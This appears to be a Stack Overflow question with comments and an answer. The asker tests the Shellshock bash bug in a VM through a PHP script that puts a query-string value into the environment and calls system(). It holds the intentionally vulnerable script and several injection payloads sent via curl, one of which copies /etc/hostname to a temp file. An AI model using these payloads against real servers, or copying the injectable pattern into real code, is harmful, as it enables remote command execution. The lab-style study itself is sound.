# PHP behavior when interacting with Shell

Tags: php, linux, bash, shell

I am trying to test PHP interaction with bash shell (version 4.2). My bash shell is not patched for shellshock (yes I know how to patch it; I'm testing in a VM; I'm more focused on PHP interaction with the shell).

I have a simple PHP program which takes an argument from a query string, adds it to environment via `putenv()` and then runs a command using `system()`. The script is as follows:

```
<?php

 function getParam() 
 {
     $arg = NULL;   

     if (isset($_GET["arg"]) && !empty($_GET["arg"])) 
     { 
         $arg = $_GET["arg"]; 
     } 
     return $arg; 
 } 

 $arg = getParam(); 

 putenv("ARG=$arg");

 system("set");

?>
```

The `system()` as you can see uses the `set` command to print the shell variables. I first tried using the following:

```
curl http://localhost/myphp.php?arg=123
```

In the output, I can see the following line:

```
ARG=123
```

In the spirit of shellshock, I then changed my argument as follows:

```
curl http://localhost/myphp.php?arg="()%20%7B%20echo%20hello;%20%7D;"
```

The argument is basically set as:

```
arg=() { echo hello; };
```

When I run the script, I don't see `ARG` in my output for set.

But then I changed the curl request as follows:

```
curl http://localhost/myphp.php?arg="()%20%7B%20echo%20hello;%20%7D;%20echo%20PID:%20;%20echo%20%24%24%20;%20echo%20Set:%20;%20set%20"
```

This time, the argument is set as:

```
arg=() { echo hello; }; echo PID:; echo $$; echo Set:; set
```

This time, I still I don't see `ARG` in output from `system()`, but I do see additional output because of the argument as:

```
PID:0

Set:
// Omitted some output
ARG () 
{ 
   echo hello
}
```

So my question is that, why don't I see the argument `ARG` in `set` output via `system()`, but see it in the `set` output via the parameter ?

**Edit**:

Rephrasing the question to make it more clear: In the PHP code, I call `system(set)` (last line) VS I pass `set` as part of the query string. Set executed via `system()` doesn't show presence of `ARG` in shell variables VS `set` executed from query string is showing (although PID is output as 0 - so that has to be taken into account to explain this).

Here is the complete output: http://pastebin.com/raw.php?i=WcBXgYAj

If I change `system(set)` to `system(env)`, I see the output: http://pastebin.com/raw.php?i=q1r6Z3Zi

Comment: I'm confused about what that last sentence means. What do you mean you don't "see the argument `ARG` in `set` output via `system()`, but see it in the `set` output via the parameter"?

Comment: @EtanReisner Please check question edit.

Comment: Ah, you mean the shellshocked `set` run versus the explicit `system` call to `set`. (I've been trying to figure out how `0` ended up on the same line as `PID:` in the first place.)

Comment: Yes you've understood the question.

Comment: So you see the output from `set` twice when you call `system` but only one copy of the output contains `ARG` in it? Or what exactly?

Comment: The outputs of the two `set` actually differ. Yes one contains `ARG` and the other does not, but I see other differences as well. The number of variables in output from `system(set)` is much more than that from the `set` executed via query string.

Comment: I've put the link containing complete output.

Comment: Fairly clearly a different shell being run there. The shellshock environment is in the apache worker but php is seemingly in a different process (or the environment isn't exported to php some other way) it looks like. How are you hosting your php file?

Comment: Its in the /var/www folder.

Comment: That's not an answer. What is running the php? mod_php? cgi? scgi? fastcgi? Something else?

Comment: Oh sorry. Its running as mod_php.

Comment: `ARG` not present in the `system(set)` output. Is that expected from an unpatched bash-4.2 shell ?

Comment: It is if it never made it into the environment of the process that ran the shell. Which shouldn't be the case here because of the `putenv` though. Are you sure `arg` is being set correctly in the php code and that `putenv` is setting it in the php process environment correctly?

Comment: Check question edit.

Comment: Are you sure you aren't patched?

Comment: Yes I'm sure. I have tested shellshock before on the same VM.

Comment: PHP and environment variables, particularly the difference between putenv, ${ENV}, and env(), are persnickety and I wouldn't advise relying on them. See the top comment at the PHP page for putenv() (yes, it's my comment from years ago). http://php.net/manual/en/function.putenv.php#98540

Comment: `strace -v -f -e execve -p PID` (where PID is your php process id) to check *which* shell is invoked and confirm the environment being passed to it.  It might be that *that* shell is patched, or that PHP alters the `putenv` argument.

Answer (score 1):

Instead of

```
arg=() { echo hello; };
```

Try this

```
() { :;};echo Yes we can...
```

or this

```
%28%29%20%7B%20%3A%3B%7D%3Becho%20Yes%20we%20can...
```

... or maybe something between

You may try to trace something:

```
(){ :;};dd if=/etc/hostname of=/tmp/testfile-$$-$RANDOM
```